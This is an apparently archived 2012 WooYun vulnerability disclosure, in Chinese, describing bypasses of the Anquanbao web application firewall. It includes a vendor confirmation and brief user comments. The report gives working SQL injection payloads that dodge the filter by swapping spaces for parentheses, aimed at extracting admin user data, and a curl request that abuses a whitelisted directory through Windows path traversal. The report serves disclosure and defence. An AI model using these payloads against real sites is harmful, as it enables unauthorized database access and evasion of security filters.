安全宝几个规则绕过

漏洞概要

缺陷编号:WooYun-2012-016230

漏洞标题:安全宝几个规则绕过

相关厂商:安全宝

漏洞作者:pentest

提交时间:2012-12-20 11:00

公开时间:2013-02-03 11:01

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:10

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-12-20: 细节已通知厂商并且等待厂商处理中
2012-12-20: 厂商已经确认,细节仅向厂商公开
2012-12-30: 细节向核心白帽子及相关领域专家公开
2013-01-09: 细节向普通白帽子公开
2013-01-19: 细节向实习白帽子公开
2013-02-03: 细节向公众公开

简要描述:

利用反向代理和真实执行环境的
1 对sql层面解析差异导致
2 对文件系统层面解析差异导致

详细说明:

地址均未编码利用反向代理和真实执行环境的1 对sql层面解析差异导致2 对文件系统层面解析差异导致1 对sql层面的解析差异导致判断:http://www.anquanbao.com/?id=1 and(1=1)http://www.anquanbao.com/?id=1 and(1)=(1)http://www.anquanbao.com/?id=1 and 1http://www.anquanbao.com/?id=1 and true利用:触发:http://www.anquanbao.com/?id=1 and '1'=(select substr(user,1,1) from admin limit 1)绕过:http://www.anquanbao.com/?id=(1)and'r'=(select(substr(user,1,1))from admin limit 1)触发:http://www.anquanbao.com/?id=1 union(select user from admin)绕过:http://www.anquanbao.com/?id=(1)union(select(user)from admin)2 对文件系统层面解析差异导致主要利用的是windows和linux文件系统路径的差异安全宝提供白名单功能,如果是win主机,则可以利用一个白名单项攻击网站任意页面。这里白名单为/test/目录触发:curl -v 'www.wtf.tk/Pages/Index.aspx?id=1+and+1=1'绕过:curl -v 'www.wtf.tk/test/..\Pages/Index.aspx?id=1+and+1=1'

漏洞证明:

见地址

修复方案:

改进正则,应该是正则吧'(?:and|or) \d+'这样的规则估计不敢上。。。

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2012-12-20 15:13

厂商回复:

谢谢反馈,我们会尽快修复。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 疯子 白帽子 | Rank:254 漏洞数:39)

    关注

  2. 2010-01-01 00:00 烨少 白帽子 | Rank:5 漏洞数:1)

    额额,前排啊

  3. 2010-01-01 00:00 possible 白帽子 | Rank:296 漏洞数:31)

    白名单 怎么发现的 呵呵